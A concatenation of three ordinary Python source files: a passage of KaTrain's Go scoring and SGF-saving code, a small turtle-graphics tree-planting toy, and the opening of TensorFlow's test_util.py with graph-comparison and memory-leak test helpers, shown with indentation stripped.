return self.current_node.format_score(round(2 * self.current_node.score) / 2) + "?"
board_size_x, board_size_y = self.board_size
ownership_grid = var_to_grid(self.current_node.ownership, (board_size_x, board_size_y))
stones = {m.coords: m.player for m in self.stones}
lo_threshold = 0.15
hi_threshold = 0.85
max_unknown = 10
max_dame = 4 * (board_size_x + board_size_y)
def japanese_score_square(square, owner):
player = stones.get(square, None)
if (
(player == "B" and owner > hi_threshold)
or (player == "W" and owner < -hi_threshold)
or abs(owner) < lo_threshold
):
return 0 # dame or own stones
if player is None and abs(owner) >= hi_threshold:
return round(owner) # surrounded empty intersection
if (player == "B" and owner < -hi_threshold) or (player == "W" and owner > hi_threshold):
return 2 * round(owner) # captured stone
return math.nan # unknown!
scored_squares = [
japanese_score_square((x, y), ownership_grid[y][x])
for y in range(board_size_y)
for x in range(board_size_x)
]
num_sq = {t: sum([s == t for s in scored_squares]) for t in [-2, -1, 0, 1, 2]}
num_unkn = sum(math.isnan(s) for s in scored_squares)
prisoners = self.prisoner_count
score = sum([t * n for t, n in num_sq.items()]) + prisoners["W"] - prisoners["B"] - self.komi
self.katrain.log(
f"Manual Scoring: {num_sq} score by square with {num_unkn} unknown, {prisoners} captures, and {self.komi} komi -> score = {score}",
OUTPUT_DEBUG,
)
if num_unkn > max_unknown or (num_sq[0] - len(stones)) > max_dame:
return None
return self.current_node.format_score(score)
def __repr__(self):
return (
"\n".join("".join(self.chains[c][0].player if c >= 0 else "-" for c in line) for line in self.board)
+ f"\ncaptures: {self.prisoner_count}"
)
def write_sgf(
self, path: str, trainer_config: Optional[Dict] = None,
):
if trainer_config is None:
trainer_config = self.katrain.config("trainer")
save_feedback = trainer_config["save_feedback"]
eval_thresholds = trainer_config["eval_thresholds"]
def player_name(player_info):
return f"{i18n._(player_info.player_type)} ({i18n._(player_info.player_subtype)})"
player_names = {
bw: re.sub(
r"['<>:\"/\\|?*]", "", self.root.get_property("P" + bw) or player_name(self.katrain.players_info[bw])
)
for bw in "BW"
}
game_name = f"katrain_{player_names['B']} vs {player_names['W']} {self.game_id}"
file_name = os.path.abspath(os.path.join(path, f"{game_name}.sgf"))
os.makedirs(os.path.dirname(file_name), exist_ok=True)
show_dots_for = {
bw: trainer_config.get("eval_show_ai", True) or self.katrain.players_info[bw].human for bw in "BW"
}
sgf = self.root.sgf(
save_comments_player=show_dots_for, save_comments_class=save_feedback, eval_thresholds=eval_thresholds
)
with open(file_name, "w", encoding="utf-8") as f:
f.write(sgf)
return i18n._("sgf written").format(file_name=file_name)
def analyze_extra(self, mode):
stones = {s.coords for s in self.stones}
cn = self.current_node
engine = self.engines[cn.next_player]
if mode == "extra":
visits = cn.analysis_visits_requested + engine.config["max_visits"]
self.katrain.controls.set_status(f"Performing additional analysis to {visits} visits")
cn.analyze(engine, visits=visits, priority=-1_000, time_limit=False)
return
elif mode == "sweep":
board_size_x, board_size_y = self.board_size
if cn.analysis_ready:
policy_grid = (
var_to_grid(self.current_node.policy, size=(board_size_x, board_size_y))
if self.current_node.policy
else None
)
analyze_moves = sorted(
[
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (policy_grid is None and (x, y) not in stones) or policy_grid[y][x] >= 0
],
key=lambda mv: -policy_grid[mv.coords[1]][mv.coords[0]],
)
else:
analyze_moves = [
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (x, y) not in stones
]
visits = engine.config["fast_visits"]
self.katrain.controls.set_status(f"Refining analysis of entire board to {visits} visits")
priority = -1_000_000_000
else: # mode=='equalize':
if not cn.analysis_ready:
self.katrain.controls.set_status(i18n._("wait-before-equalize"), self.current_node)
return
analyze_moves = [Move.from_gtp(gtp, player=cn.next_player) for gtp, _ in cn.analysis["moves"].items()]
visits = max(d["visits"] for d in cn.analysis["moves"].values())
self.katrain.controls.set_status(f"Equalizing analysis of candidate moves to {visits} visits")
priority = -1_000
for move in analyze_moves:
cn.analyze(
engine, priority, visits=visits, refine_move=move, time_limit=False
) # explicitly requested so take as long as you need
def analyze_undo(self, node):
train_config = self.katrain.config("trainer")
move = node.move
if node != self.current_node or node.auto_undo is not None or not node.analysis_ready or not move:
return
points_lost = node.points_lost
thresholds = train_config["eval_thresholds"]
num_undo_prompts = train_config["num_undo_prompts"]
i = 0
while i < len(thresholds) and points_lost < thresholds[i]:
i += 1
num_undos = num_undo_prompts[i] if i < len(num_undo_prompts) else 0
if num_undos == 0:
undo = False
elif num_undos < 1: # probability
undo = int(node.undo_threshold < num_undos) and len(node.parent.children) == 1
else:
undo = len(node.parent.children) <= num_undos
node.auto_undo = undo
if undo:
self.undo(1)
self.katrain.controls.set_status(
i18n._("teaching undo message").format(move=move.gtp(), points_lost=points_lost)
)
self.katrain.update_state()
|
PLANT IT ALLL.py | from random import *
from turtle import *
from tkinter import *
#from multiprocessing import Process
#processes = []
SEE = False
dismod = (2/3,3/4,3/5,7/8) ; c = 2 ; d = 5
a = 15 ; b = 40 ; minpix = 10 ; wmod = 3/5
ground = - 225
seeds = 0
rightmost = 0
leftmost = 0
listen()
w = Screen()
w.tracer(0,0)
w.bgcolor("black")
zulu = 0
gnd = Turtle() ; seee = Turtle() ; seee.color("white") ; seee.ht()
gnd.pu()
gnd.ht()
gnd.color("white")
gnd.begin_fill()
gnd.goto(-1000 , ground)
gnd.towards( 0 , ground )
gnd.pd()
for _ in range(2000) :
gnd.fd(1) ; gnd.lt(randint(-20,21)/3)
if _%5 == 0 : gnd.setheading(0)
gnd.goto(1000 , ground - 200 )
gnd.goto(-1000 , ground - 200 )
gnd.goto(-1000 , ground )
gnd.end_fill()
seee.pu()
seee.goto( 0 , 100)
seee.write("PLANT")
T = []
for _ in range (100) : T.append(Turtle()) ; seeds += 1
def see() :
seee.clear()
seee.write(f"Seeds : {seeds}\nDistance : {int(rightmost - leftmost)}")
def make_t(t) :
t.ht()
t.color("white")
t.pu()
t.dy = 0
t.setheading(randint(85,95))
for t in T :
make_t(t)
t.shape("circle")
t.shapesize(0.5)
t.g = 0.05
t.setundobuffer(0)
t.taken = False
t.used = False
t.tree = False
t.once = False
def multitask() :
global seeds , leftmost , rightmost
for t in T :
if t.used :
if t.taken and not t.tree :
t.fd(1)
if t.ycor() >= ground :
t.sety(t.ycor() - t.dy)
t.dy += t.g
if not t.ycor() >= ground :
t.tree = True
if t.xcor() > rightmost : rightmost = t.xcor()
if t.xcor() < leftmost : leftmost = t.xcor()
t.pd()
t.ht()
PLANT(t , 2*randint(15,40)/2 , randint(20,35) , randint(40,65)/10 )
#make_t(t)
t.tree = False
t.taken = False
t.once = True
if not t.once : seeds += 1 ; see()
#process = Process(target = tree , args = ( t , 40 , 30 , 4 ) )
#processes.append( process )
#process.start()
w.update()
def dot(x , y) :
global seeds
for t in T :
if not t.taken and not t.once :
if not t.used : t.used = True ; t.st()
t.taken = True
t.ht()
seeds -= 1
see()
t.goto(x , y)
t.st()
break
def fresh() :
global leftmost , rightmost
leftmost = rightmost = 0
for t in T : t.clear()
def tree(t,x,y,s) :
if x < minpix :
if SEE : multitask()
return
else :
zzz = s*wmod ; zz = y*0.98 ; z = choice(dismod)*x
t.width(s) ; t.fd(x)
tree(t,z*1.01,zz,zzz)
lll = choice((1,-1))
t.lt(lll*y)
tree(t,z,zz,zzz)
t.rt(lll*2*y)
tree(t,z,zz,zzz)
#if z < minpix : multitask()
t.lt(lll*y) ; t.bk(x)
def root(t,x,y,w) :
t.width(w)
s = w*wmod
i = int(x)
z = x*choice(dismod)
zz = choice((z,z/10))
aaa = choice((1,2))
if aaa == 1 : zzz = z ; zzzz = zz
else : zzz = zz ; zzzz = z
yy = y - 0.1
angs = []
diss = []
for _ in range(i) : angs.append(randint(-10,10)) ; diss.append(randint(9,10)/10)
for _ in range(i) : t.fd(diss[_]) ; t.lt(angs[_])
t.lt(y)
#t.fd(z)
#t.bk(z)
if x > minpix : root(t , zzz,yy,s)
t.rt(2*y)
if x > minpix : root(t , zzzz,yy,s)
t.lt(y)
for _ in range(i) : t.rt(angs[i - _ - 1]) ; t.bk(diss[i - _ - 1])
def PLANT(p1 , p2 , p3 , p4 ) :
global zulu
Temp_x = p1.xcor()
Temp_y = p1.ycor()
p1.begin_poly()
tree(p1 , p2 , p3 , p4)
Treah = p1.get_poly()
p1.setheading(-90)
p1.color("black")
p1.begin_poly()
root(p1 , p2 , p3 , p4)
Treag = p1.get_poly()
Treaa = Shape("compound")
Treaa.addcomponent(Treah , "white")
Treaa.addcomponent(Treag , "red")
w.register_shape("Tree" + str(zulu) , Treaa)
p1.shape("Tree" + str(zulu))
p1.setheading(90)
p1.goto(0,-110)
#p1.setx(Temp_x)
#p1.sety(p1.ycor() + Temp_y)
p1.clear()
p1.st()
zulu += 1
#x = -250
#y = 100
#for _ in range(10) : dot(x , y) ; x+= 2*randint(25,50)
x = 0
while True :
x += 1
onscreenclick(dot)
if x%randint(1,100) == 0 : x = 0 ; dot(randint(-500,500) , 300 )
#if x%5000 == 0 : fresh()
onkey(fresh , "w" )
#see()
multitask()
|
test_util.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable MLIR compilation.
def is_mlir_bridge_enabled():
return False
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable TFRT.
def is_tfrt_enabled():
return False
try:
from tensorflow.python.framework.is_tfrt_test_true import is_tfrt_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}: {}".format(type(e), str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The numer of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
f(self, *args, **kwargs)
# Some objects are newly created by _get_object_count_by_type(). So
# create and save as a dummy variable to include it as a baseline.
obj_count_by_type = _get_object_count_by_type()
gc.collect()
obj_count_by_type = _get_object_count_by_type()
if ops.has_default_graph():
collection_sizes_before = {
collection: len(ops.get_collection(collection))
for collection in ops.get_default_graph().collections
}
for _ in range(3):
f(self, *args, **kwargs)
# Note that gc.get_objects misses anything that isn't subject to garbage
# collection (C types). Collections are a common source of leaks, so we
# test for collection sizes explicitly.
if ops.has_default_graph():
for collection_key in ops.get_default_graph().collections:
collection = ops.get_collection(collection_key)
size_before = collection_sizes_before.get(collection_key, 0)
if len(collection) > size_before:
raise AssertionError(
("Collection %s increased in size from "
"%d to %d (current items %s).") %
(collection_key, size_before, len(collection), collection))
# Make sure our collection checks don't show up as leaked memory by
# removing references to temporary variables.
del collection
del collection_key
del size_before
del collection_sizes_before
gc.collect()
# There should be no new Python objects hanging around.
obj_count_by_type = _get_object_count_by_type() - obj_count_by_type
# In some cases (specifically on MacOS), new_count is somehow
# smaller than previous_count.
# Using plain assert because not all classes using this decorator
# have assertLessEqual
assert not obj_count_by_type, (
"The following objects were newly created: %s" %
str(obj_count_by_type))
gc.enable()
return decorator
if func is None:
return wrap_f
else:
return wrap_f(func)
def assert_no_new_tensors(f):
"""Decorator for asserting that no new Tensors persist after a test.
Mainly useful for checking that code using the Python C API has correctly
manipulated reference counts.
Clears the caches that it knows about, runs the garbage collector, then checks
that there are no Tensor or Tensor-like objects still around. This includes
Tensors to which something still has a reference (e.g. from missing
Py_DECREFs) and uncollectable cycles (i.e. Python reference cycles where one
of the objects has __del__ defined).
Args:
f: The test case to run.
Returns:
The decorated test case.
"""
def decorator(self, **kwargs):
"""Finds existing Tensors, runs the test, checks for new Tensors."""
def _is_tensorflow_object(obj):
try:
return isinstance(obj,
(ops.Tensor, variables.Variable,
tensor_shape.Dimension, tensor_shape.TensorShape))
except ReferenceError:
# If the object no longer exists, we don't care about it.
return False
tensors_before = set(
id(obj) for obj in gc.get_objects() if _is_tensorflow_object(obj))
outside_executed_eagerly = context.executing_eagerly()
# Run the test in a new graph so that collections get cleared when it's
# done, but inherit the graph key so optimizers behave.
outside_graph_key = ops.get_default_graph()._graph_key
with ops.Graph().as_default():
ops.get_default_graph()._graph_key = outside_graph_key
if outside_executed_eagerly:
with context.eager_mode():
result = f(self, **kwargs)
else:
result = f(self, **kwargs)
# Make an effort to clear caches, which would otherwise look like leaked
# Tensors.
context.context()._clear_caches() # pylint: disable=protected-access
gc.collect()
tensors_after = [
obj for obj in gc.get_objects()
if _is_tensorflow_object(obj) and id(obj) not in tensors_before
]
if tensors_after:
raise AssertionError(("%d Tensors not deallocated after test: %s" % (
len(tensors_after),
str(tensors_after),
)))
return result
return decorator
def _find_reference_cycle(objects, idx):
def get_ignore_reason(obj, blacklist):
"""Tests whether an object should be omitted from the dependency graph."""
if len(blacklist) > 100:
return "<depth limit>"
if tf_inspect.isframe(obj):
if "test_util.py" in tf_inspect.getframeinfo(obj)[0]:
return "<test code>"
for b in blacklist:
if b is obj:
return "<test code>"
if obj is blacklist:
return "<test code>"
return None
# Note: this function is meant to help with diagnostics. Its output is purely
# a human-readable representation, so you may freely modify it to suit your
# needs.
def describe(obj, blacklist, leaves_only=False):
"""Returns a custom human-readable summary of obj.
Args:
obj: the value to describe.
blacklist: same as blacklist in get_ignore_reason.
leaves_only: boolean flag used when calling describe recursively. Useful
for summarizing collections.
"""
if get_ignore_reason(obj, blacklist):
return "{}{}".format(get_ignore_reason(obj, blacklist), type(obj))
if tf_inspect.isframe(obj):
return "frame: {}".format(tf_inspect.getframeinfo(obj))
elif tf_inspect.ismodule(obj):
return "module: {}".format(obj.__name__)
else:
if leaves_only:
return "{}, {}".format(type(obj), id(obj))
elif isinstance(obj, list):
return "list({}): {}".format(
id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, tuple):
return "tuple({}): {}".format(
